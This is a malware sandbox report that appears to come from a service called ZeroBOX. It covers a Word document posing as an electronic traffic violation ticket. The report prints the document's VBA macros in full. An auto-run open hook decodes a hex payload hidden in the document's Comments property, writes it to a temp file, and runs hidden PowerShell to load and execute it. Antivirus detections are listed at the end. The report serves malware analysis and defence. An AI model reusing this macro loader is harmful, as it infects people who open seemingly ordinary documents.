popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
     Call Mycolor
     Call labelc
End Sub



Private Sub Document_Close()
ActiveDocument.Save
End Sub

Private Sub labelc()

Label1.Picture = Nothing

Label1.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"
   
Label2.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"

Label3.Caption = "—‚?? Ø¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½Electronic Traffic Violation Ticket:00073146 »óÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñ "


End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
     Call Mycolor
     Call labelc
End Sub



Private Sub Document_Close()
ActiveDocument.Save
End Sub

Private Sub labelc()

Label1.Picture = Nothing

Label1.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"
   
Label2.Caption = "—‚?? ðsžšåÞ?½ R§U—?¯ ©—£—?© —????ñâmå•ñâmå•?¯ —‚?? ¦?¯Â£Þ¥¿ ¶????ðsžšåÞ?½  — »óÞ¢áñ »????—‚? —????—£ޥ¿ æØ¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ¥¿© (113)? ráÚÆ R§U—‚? ¶â€š?R§U½  £ ?R§U½    R§U©â€š?R§U½    æØ¢Ã??? ©?¶????½    ¯ »óÞ¢áñ »????—‚? ????©ñâmå•?¶—© (38 £½  ¯ 88). €š?????©— ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½"

Label3.Caption = "—‚?? Ø¢Ã???????Þ¥¿¯© (39) £½   ¯ —????—£ޥ¿ ¦?¯Â£Þ½ £—R§U????½  áÍÞæ£ñâmå•Â£½  ?R§U½  R§U©â€š??¯ —‚?R§U???¯? ©?——R§U½   æØ¢Ã??? £ ????¶???????¯ ???????? —‚?? ¦????©— æØ¢Ã???????Þ¥¿¯ ¦?¯Â£Þ¥¿© £½Electronic Traffic Violation Ticket:00073146 »óÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñÞ¢áñ  »óÞ¢áñ "


End Sub

Original

                                        Attribute VB_Name = "Module1"
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



Sub Mycolor()

Dim prop As DocumentProperty
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        Put #fnum, , abc(CStr(s))
    
Close #fnum


fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True


End Sub

Deobfuscated

                                        Attribute VB_Name = "Module1"
Private Function abc(ByVal he As String) As Byte()
    Dim n As Long
    Dim ic As Long
    Dim bArr() As Byte
    ic = Len(he)
    If (ic And 1) = 1 Then
        he = "0" & he
        ic = ic + 1
    End If
    
    ReDim bArr(ic \ 2 - 1)
    For n = 1 To ic Step 2
        
        bArr((n - 1) \ 2) = CByte("&H" & Mid$(he, n, 2))
    Next
    
    abc = bArr
End Function



Sub Mycolor()

Dim prop As DocumentProperty
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
        Put #fnum, , abc(CStr(s))
    
Close #fnum


fr = "'" & Environ("TMP") & "\skfk.txt'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True


End Sub
[Content_Types].xml
_rels/.rels
word/document.xml
9]eJ/2r
}~rb;P
h:!]3{N
word/_rels/document.xml.rels
M//&/P1t
word/vbaProject.bin
6D3b;b
vp|m[__,Rz
w3;55xa
RLJcL|j
a3ll`-
F;s^*2
?.Qt%B
OaQ69GRo
}<;AZyT
UN+lG.
Zd[g7j
G!tPT&
ZCFLOW
W.3=M/tf:O
r6X]u.
word/media/image1.wmf
R"IROKb
S%IROHb
vhAp!\
z+Scc\v
B-^.Nq
n6fl5*
:7q8h~b
}p|:~E
^f/c2\f
^-(Auv
V;.s4d[+
:2A:dQ
Q#g$'n_
_>|WHI
m@Ta/
B#_gPC
_NY|[
aSRFNIJ
}@p0~X
FZ>&fMJ
;L$:WS
jclezy
^>K"jz
&0VZTU&}
*bUi:I
O>@;Is30
^ncA+!
hO>~`Sc
cEyKUR8
Ym5g(`t
)D/scL
CQgcH#
8w}>'|
xYnfKM
4xAD PbD`
%8M'y<g9i
\]NiKu
lC_aGT
[f*$7,
)_[nWg
/6x}=W`N
v}/}-u
C#_I7C
:E'B[9E
word/media/image2.wmf\R
Xci49
M0N'id
word/media/image3.wmf
word/theme/theme1.xml
n!td[;
5}4Onb
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/vbaData.xml
2bb=r
wk!5^&
ITYN6b8
word/settings.xml
5R@AD]
,*D!+W
98 P{k(
^MP~[TI
word/styles.xml
^?d*g3
}UYYDO
B$b46-
s<{w?u{
i5+[MkI
Io3E&H
Q)aaT2X
word/webSettings.xml
]?cv0$G
word/activeX/activeX1.xmld
word/activeX/activeX1.bin
dneiieI
T4tp$(
[U>MnUq
HtKP`Dd?
z,">1?
?+ SLn
*t<"jZ:.
~%rLq
obb95I
:A+ioq
RN!}x
ky9[?VV
6zU~}l
word/activeX/activeX2.xmld
word/activeX/activeX2.bin
2o>FF}?
word/activeX/activeX3.xmld
word/activeX/activeX3.bin
57)5%%5E
word/fontTable.xml
docProps/core.xml
SZMd<Y
33,7rn#
E*F/bP7
I'>;'Z+&
ho^j<m%
F2R.k8
,o~%&\
"O%O'
Csyyx6
}[~@U{
docProps/app.xml
UY^sxAp5
word/activeX/_rels/activeX1.xml.relsl
>OO/`
word/activeX/_rels/activeX2.xml.relsl
word/activeX/_rels/activeX3.xml.relsl
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/vbaProject.binPK
word/media/image1.wmfPK
word/media/image2.wmfPK
word/media/image3.wmfPK
word/theme/theme1.xmlPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/activeX/activeX1.xmlPK
word/activeX/activeX1.binPK
word/activeX/activeX2.xmlPK
word/activeX/activeX2.binPK
word/activeX/activeX3.xmlPK
word/activeX/activeX3.binPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
word/activeX/_rels/activeX1.xml.relsPK
word/activeX/_rels/activeX2.xml.relsPK
word/activeX/_rels/activeX3.xml.relsPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb modification of W97M.Suspicious.1
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender VB.Heur2.PwShell.2.44355A71.Gen
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen84
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB.Heur2.PwShell.2.44355A71.Gen
Rising Clean
Ad-Aware VB.Heur2.PwShell.2.44355A71.Gen
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.qc
FireEye VB.Heur2.PwShell.2.44355A71.Gen
Emsisoft VB.Heur2.PwShell.2.44355A71.Gen (B)
SentinelOne Static AI - Malicious OPENXML
Avast-Mobile Clean
Jiangmin Clean
Avira Clean
MAX malware (ai score=87)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit VB.Heur2.PwShell.2.44355A71.Gen
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
GData VB.Heur2.PwShell.2.44355A71.Gen
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/WOX.Obfus.Gen.8
VBA32 Clean
Zoner Clean
Tencent Heur.Macro.Generic.a.14e6b9e2
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.2EA16!tr.dldr
Panda Clean
No IRMA results available.